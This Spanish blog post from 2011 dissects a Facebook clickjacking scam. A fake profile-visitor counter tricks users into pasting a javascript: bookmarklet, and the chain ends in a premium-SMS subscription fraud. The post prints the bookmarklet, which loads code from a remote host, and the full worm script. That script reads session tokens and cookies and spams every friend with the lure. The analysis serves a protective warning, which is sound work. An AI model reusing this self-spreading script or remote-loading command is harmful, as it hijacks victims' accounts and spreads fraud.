Descubre quién te visita en Facebook?

Todo empieza cuando recibimos en nuestro muro de Facebook un comentario de este tipo:

Te puedes creer que 31 personas han visitado mi perfil hoy? Ademas me dice quien y la hora jejej, si quieres saberlo pulsa Escanear perfil aqui abajo y podras ver tu contador.

Este comentario tiene abajo un enlace que dice escanear perfil y que apunta a una dirección (URL) externa que es esta:

http://www.lectorperf.es/?ref=nf

Se trata de una página ajena a facebook que nos muestra la manera de (supuestamente) instalarnos la forma de saber quién ha visitado nuestro perfil.

Ávidos de conocimiento (más bien curiosidad malsana...)  seguimos los pasos que nos explican en la página, que son estos:

1. - pulsar el botón COPIAR
2. - al pulsarlo, nos redirige a facebook: si ya habíamos entrado nos aparece nuestro perfil; si no... entonces nos pide usuario y contraseña.
3. - pegar el código en la barra de direcciones de nuestro explorador de internet.

Atención, que aquí empieza lo interesante!

El código en cuestión es éste:

javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://lectorperf.es/perfil.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

La verdad es que es un churro que sólo entendemos los programadores de sitios web, ahí va la explicación del churro:

Lo primero es ponerlo un poco más bonito...

javascript:(

    function() {

          _ccscr=document.createElement('script');

          _ccscr.type='text/javascript';

          _ccscr.src='http://lectorperf.es/perfil.js?'+(Math.random());

          document.getElementsByTagName('head')[0].appendChild(_ccscr);

     }

)  ();

Esto lo que hace es ejecutar un script desde nuestra barra de direcciones del navegador.  Llama a un archivo .js (javascript) que se encuentra en la dirección:  http://lectorperf.es/perfil.js  y además le pasa un número aleatorio como parámetro

 El código de ese archivo de javascript es este:

var message = "Te puedes creer que 31 personas han visitado mi perfil hoy? Ademas me dice quien y la hora jejej, si quieres saberlo pulsa Escanear perfil aqui abajo y podras ver tu contador.";
var jsText = "http://www.lectorperf.es";
var myText = "Escanear perfil";

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
 data = eval('(' + gf.responseText.substr(9) + ')');
 if(data.error){ }else{
  friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
 }
}
for(var i=0; i  var httpwp = new XMLHttpRequest();
 var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
 var paramswp = "&__d=1&app_id=6261817190&extern=1&" +
       "&post_form_id=" + post_form_id +
       "&fb_dtsg=" + fb_dtsg +
       "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
       "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
       "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
       "&user_message=" + message;
 httpwp.open("POST", urlwp, true);
 httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
 httpwp.setRequestHeader("Content-length", paramswp.length);
 httpwp.setRequestHeader("Connection", "keep-alive");
 httpwp.onreadystatechange = function(){
  if (httpwp.readyState == 4 && httpwp.status == 200){
   
  }
 }
 httpwp.send(paramswp);
}

alert("Estos datos son confidenciales. Identificate como una persona real y termina la instalacion del escaner de perfil");
window.location = "http://www.lectorperf.es/redirige_promo.php"

 Para no aburrir demasiado... esto lo que hace es recopilar cierta información de tu cuenta de facebook, y envía mensajes a todos tus amigos con el mensaje que te llegó a tí. Es una forma muy eficiente de extenderse, de hecho se extiende viralmente.

Al final redirige a la página   http://www.lectorperf.es/redirige_promo.php

que a su vez, redirige a    http://www.n-mobile.net/continuacion/?ncode=9b0cfeb38b6926367d589eda09f343d5&id_promo=85

Y aquí está el verdadero culpable del timo!!!  Se nos abre una ventana para que introduzcamos nuestro número de teléfono móvil. Después nos llegará un SMS de confirmación, para que metamos el código que nos han enviado. Con esto, lo que hacemos es aceptar las condiciones del servicio, que no son otras que aceptar que nos envíen SMSs todos los días y que nos cobren por cada uno de ellos 1,42 euros. O sea, que al mes  nos estarán timando unos 42,6 euros.

 Atención a la letra pequeña, que aquí la ponemos grande:

Servicio de suscripción. Servicio para Mayores de edad o menores con capacidad legal para contratar. Suscribiéndote a nuestros portales wap de contenido participas en la promoción 'Coge tus 1000 euros'. Para saber la compatibilidad de tu terminal con los contenidos ofertados en el portal consúltalo aquí. Para descargar contenido de los portales es necesario tener habilitada la conexión wap en tu terminal. El coste del servicio de suscripción es de 1.42€/sms/día(iva incluido) recibido más el coste de navegación wap que dependerá del operador que tengas contratado. Máximo 10sms/semana. Para cancelar el servicio, envía BAJA al 795600 o 795100 (el número del que recibes los sms del servicio). Responsable del servicio: Datatalk Comunicaciones S.L.; info@datatalk.es ; nº Atención al Cliente 902354525. CIF: B-83957100. Apdo correos 88 28230 Las Rozas Madrid. Términos y condiciones generales.

La verdad es que la forma que tienen para atraer a incautos que pongan sus números de teléfono y enviarles SMSs , a 1,42 euros por mensaje y dia es bastante sofisticada.

El responsable del timo es la empresa de comunicaciones  Datatalk Comunicaciones S.L.

Si alguien quiere denunciar por estafa... lo puede hacer, pero no creo que sirva de nada, porque si no te has leido la letra pequeña es tu problema.

Conclusión: no instales el programa en tu facebook y menos aún, escribas tu teléfono móvil en la ventana que te aparece. Y menos aún escribas el código de aceptación de sus servicios.

[Actualización del día 17/05/2011]

Hoy me ha redirigido a esta otra página de promoción: http://www.mobmatic.com/lps/blanco/uces1/

Esta vez la letra pequeña es esta:

Servicio de suscripción prestado por Sprint Media S.L. Suscríbete y podrás enviar SMS ilimitados. El servicio de suscripción de Mobmatic sólo cuestauno con cuarenta y dos centimos de eur / sms recibido (+uno con cuarenta y dos centimos de eur alta) IVA incluido. Máximo 25sms/mes. Para cancelar el servicio envíe baja al 797121. Términos y condiciones generales. Política de privacidad. Número de atención al cliente: 902877985 ó soporte@mobmatic.com. Haciendo click en continuar usted acepta recibir mensajes promocionales gratuitos relacionados con este servicio así como otros servicios relacionados.

Artículo relacionado con este fraude viral: De quién es el teléfono 902877985